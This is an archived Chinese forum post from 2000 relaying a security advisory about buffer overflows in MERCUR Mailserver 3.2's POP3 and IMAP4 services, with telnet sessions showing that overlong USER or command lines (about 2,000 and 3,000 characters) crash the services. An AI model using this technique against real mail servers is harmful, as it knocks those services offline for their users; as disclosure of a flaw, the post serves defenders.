精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>MERCUR v3.2* 的远程/本地多重DoS攻击漏

主题:MERCUR v3.2* 的远程/本地多重DoS攻击漏
发信人: netcc()
整理人: (2000-03-15 19:48:46), 站内信件
UssrLabs发现在MERCUR v3.20.*软件中多处没有进行边界检测。这将导致许多拒
绝服务问题。

受影响的系统包括:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT
MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT

例如:
[[email protected]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.

+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at
 Tue, 14 M
ar 2000 03:30:39 -0300
user (buffer)

大约2000个字符就能产生缓冲溢出。

[[email protected]$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready 
at Tue, 14
Mar 2000 03:34:09 -0300 
(buffer)

大约3000个字符就能产生缓冲溢出。


这样将会导致该程序的pop3和imap服务产生拒绝服务。
供应商地址http://www.atrium-software.com
http://www.atrium-software.com/mercur/mercur_e.html

--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 210.75.33.214]

[关闭][返回]